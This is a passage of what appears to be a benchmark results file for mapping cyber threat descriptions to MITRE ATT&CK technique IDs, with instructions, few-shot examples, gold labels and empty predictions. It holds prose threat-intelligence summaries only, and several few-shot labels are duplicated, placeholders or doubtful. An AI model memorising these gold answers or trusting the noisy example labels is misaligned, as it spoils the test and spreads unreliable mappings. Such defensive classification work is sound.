description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Indrik Spider has served fake updates via legitimate websites that have been compromised.\n\t - T1584.004: Compromise Infrastructure - Server\n- Text: Chaes can download additional files onto an infected machine.\n\t - T1105: Ingress Tool Transfer\n- Text: In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer\u2019s research. In fact, this was a new component \u2014 called Tonnerre \u2014 which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone.\n\t - T1587.001: Develop Capabilities - Malware\n", + "input": "During CostaRicto, the threat actors used scheduled tasks to download backdoor tools.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword \u201cInternet Widgits Pty Ltd\u201d is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n\t - T1185: Browser Session Hijacking\n- Text: is known to have the capability to overwrite the firmware on hard drives from some manufacturers.\n\t - T1542.002: Pre-OS Boot - Component Firmware\n", + "input": "Moafee has been known to employ binary padding.", + "gold": "- T1027.001: Obfuscated Files or Information - Binary Padding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WindTail can invoke Apple APIs \"contentsOfDirectoryAtPath\", \"pathExtension\", and (string) \"compare\".\n\t - T1106: Native API\n- Text: RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n", + "input": "Silence has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POWRUNER can use base64 encoded C2 communications.\n\t - T1001: Data Obfuscation\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The encrypted message is then Base64 encoded, replacing all the \u2018/\u2019 and \u2018+\u2019 characters with the \u2018.\u2019 and \u2018-\u2019 characters, respectively\n\t - T1027: Obfuscated Files or Information\n\t - T1132: Data Encoding\n- Text: The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", + "input": "BLINDINGCAN has encoded its C2 traffic with Base64.", + "gold": "- T1132.001: Data Encoding - Standard Encoding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Spark has used a custom XOR algorithm to decrypt the payload.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "Gamaredon Group tools decrypted additional payloads from the C2. Gamaredon Group has also decoded base64-encoded source code of a downloader.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has deleted Windows Event Logs to hinder forensic investigation.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: Sandworm Team has disabled event logging on compromised systems.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files\n\t - T1070.003: Indicator Removal - Clear Command History\n\t - T1046: Network Service Discovery\n", + "input": "Wevtutil can be used to clear system and security event logs from the system.", + "gold": "- T1070.001: Indicator Removal - Clear Windows Event Logs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LitePower has the ability to list local drives and enumerate the OS architecture.\n\t - T1082: System Information Discovery\n- Text: A file stealer can gather the victim's username to send to a C2 server.\n\t - T1033: System Owner/User Discovery\n- Text: Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.\n\t - T1016: System Network Configuration Discovery\n", + "input": "MirageFox can collect CPU and architecture information from the victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Pandora can use DLL side-loading to execute malicious payloads.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n", + "input": "Evilnum has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.", + "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).\n\t - T1047: Windows Management Instrumentation\n- Text: According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry\n\t - T1569.002: System Services - Service Execution\n- Text: Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.\n\t - T1570: Lateral Tool Transfer\n", + "input": "Olympic Destroyer uses WMI to help propagate itself across a network.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1204.001: User Execution - Malicious Link\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization\n\t - T1204.002: User Execution - Malicious File\n\t - T1047: Windows Management Instrumentation\n- Text: Confucius has sent malicious links to victims through email campaigns.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "APT3 has lured victims into clicking malicious links delivered through spearphishing.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used \"whoami\" to identify the local user and their privileges.\n\t - T1033: System Owner/User Discovery\n- Text: Empire can add a SID-History to a user if on a domain controller.\n\t - T1134.005: Access Token Manipulation - SID-History Injection\n- Text: captures window titles.\n\t - T1010: Application Window Discovery\n\t - T1010: Application Window Discovery\n", + "input": "Gazer obtains the current user's security identifier.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: REvil has the capability to destroy files and folders.\n\t - T1485: Data Destruction\n- Text: After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command\n\t - T1490: Inhibit System Recovery\n", + "input": "BLACKCOFFEE has the capability to delete files.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n", + "input": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.", + "gold": "- T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).\n\t - T1210: Exploitation of Remote Services\n- Text: Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", + "input": "Tonto Team has used EternalBlue exploits for lateral movement.", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has renamed system utilities such as \"wscript.exe\" and \"mshta.exe\".\n\t - T1036.003: Masquerading - Rename System Utilities\n- Text: uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.\n\t - T1036: Masquerading\n- Text: FIN8 aggregates staged data from a network into a single location.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "menuPass has renamed certutil and moved it to a different location on the system to avoid detection based on use of the tool.", + "gold": "- T1036.003: Masquerading - Rename System Utilities", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Then calls the fcL4qOb4 function to set the scheduled task and disguise as the one used by Google\n\t - T1036.004: Masquerading - Masquerade Task or Service\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Carbon creates several tasks for later execution to continue persistence on the victim\u2019s machine.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "RTM has named the scheduled task it creates \"Windows Update\".", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Earth Lusca has acquired and used a variety of open source tools.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: esentutl can use Volume Shadow Copy to copy locked files such as ntds.dit.\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "DarkVishnya has obtained and used tools such as Impacket, Winexe, and PsExec.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLINDINGCAN has executed commands via cmd.exe.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: can create a remote shell and run a given command.\n\t - T1059: Command and Scripting Interpreter\n- Text: BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.\n\t - T1112: Modify Registry\n", + "input": "PoisonIvy creates a backdoor through which remote attackers can open a command-line interface.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stuxnet used xp_cmdshell to store and execute SQL code.\n\t - T1505.001: Server Software Component - SQL Stored Procedures\n- Text: BLUELIGHT can download additional files onto the host.\n\t - T1105: Ingress Tool Transfer\n- Text: The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack\n\t - T1489: Service Stop\n", + "input": "SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: The logging functions are hooked so that whenever the backdoor is used, nothing gets sent to the logging facility, leaving no trace of the backdoor in the log files on disk. If the backdoor is not in use, logging will behave normally and function calls will get redirected to the original function implementation\n\t - T1562.006: Impair Defenses - Indicator Blocking\n- Text: Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "netsh can be used to disable local firewall settings.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1499.004: Endpoint Denial of Service - Application or System Exploitation\n\t - T1190: Exploit Public-Facing Application\n\t - T1210: Exploitation of Remote Services\n\t - T1588.005: Obtain Capabilities - Exploits\n- Text: No matching sample found for T1563\n", + "input": "Patchwork attempted to use RDP to move laterally.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: down_new has the ability to base64 encode C2 communications.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: After obtaining the unique ID from the C2 server, the Trojan calls the \u201cSetAbStatById\u201d method to notify the C2 server of its status of \u201c1\u201d to notify the server it had successfully received the filename and file data\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "SharpStage has decompressed data received from the C2 server.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails. The group is still using similar phishing models previously mentioned in the KISA report with some small changes\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1589.002: Gather Victim Identity Information - Email Addresses\n- Text: APT32 has conducted targeted surveillance against activists and bloggers.\n\t - T1589: Gather Victim Identity Information\n- Text: Silent Librarian has collected lists of names for individuals from targeted organizations.\n\t - T1589.003: Gather Victim Identity Information - Employee Names\n", + "input": "LAPSUS$ has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.", + "gold": "- T1589.002: Gather Victim Identity Information - Email Addresses", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1556.006\n- Text: BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.\n\t - T1553.006: Subvert Trust Controls - Code Signing Policy Modification\n- Text: Stuxnet reduces the integrity level of objects to allow write actions.\n\t - T1562: Impair Defenses\n", + "input": "Maze has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg. It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fake domains . Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. The attackers then used this fake website, which they hosted on a domain that was nearly identical to its legitimate counterpart, to distribute ObliqueRAT. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Malicious file-sharing domains . Transparent Tribe also regularly registers domains that appear to be legitimate file- and media-sharing services. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Conference attendees . Transparent Tribe also finds attendees of specific conferences to target. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Magic Hound has used compromised domains to host links targeted to specific phishing victims.\n\t - T1584.001: Compromise Infrastructure - Domains\n- Text: For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "Winnti Group has registered domains for C2 that mimicked sites of their intended targets.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service\n\t - T1102: Web Service\n- Text: MuddyWater has used web services including OneHub to distribute remote access tools.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations.\n\t - T1583.006: Acquire Infrastructure - Web Services\n", + "input": "CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": 